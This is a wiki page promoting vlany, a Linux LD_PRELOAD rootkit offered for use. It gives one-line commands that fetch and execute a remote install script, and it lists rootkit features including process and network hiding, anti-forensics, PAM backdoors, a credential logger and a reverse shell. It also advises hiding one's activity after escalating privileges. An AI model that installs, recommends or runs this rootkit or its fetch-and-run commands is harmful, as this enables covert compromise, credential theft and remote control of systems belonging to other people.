#vlany (wiki)
####vlany is a Linux LD_PRELOAD rootkit.
##Installing
-
vlany's quick_install.sh script is the fastest/easiest method of installation.
root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh
The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished. -
It's very simple to install vlany onto a sytem as it comes with an automated install script.
To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz -
Once it's downloaded you just have to run
install.shinside vlany-master.
root@vlany:~# cd vlany-master && ./install.sh
By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.
###ASCIICAST OF INSTALLATION
Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.
##Downloads
quick_install.sh
vlany.tar.gz
##Features
- Process hiding
- User hiding
- Network hiding
- LXC container
- Anti-Debug
- Anti-Forensics
- Persistent (re)installation & Anti-Detection
- Dynamic linker modifications
- Backdoors
- accept() backdoor (derived from Jynx2)
- PAM backdoor
- PAM auth logger
- snodew reverse shell backdoor
- vlany-exclusive commands
##Known bugs Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed. ###Serious bugs
- Vlany bricks systemd distributions on reboot so sysvinit distributions are safe.
- vlany fails to install correctly on anything above CentOS 6.6.
###Minor bugs No minor bugs present as of now. Please use the issues page to report any bugs that may arise while using vlany.
##In-depth README.txt (very detailed but not maintained)
NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.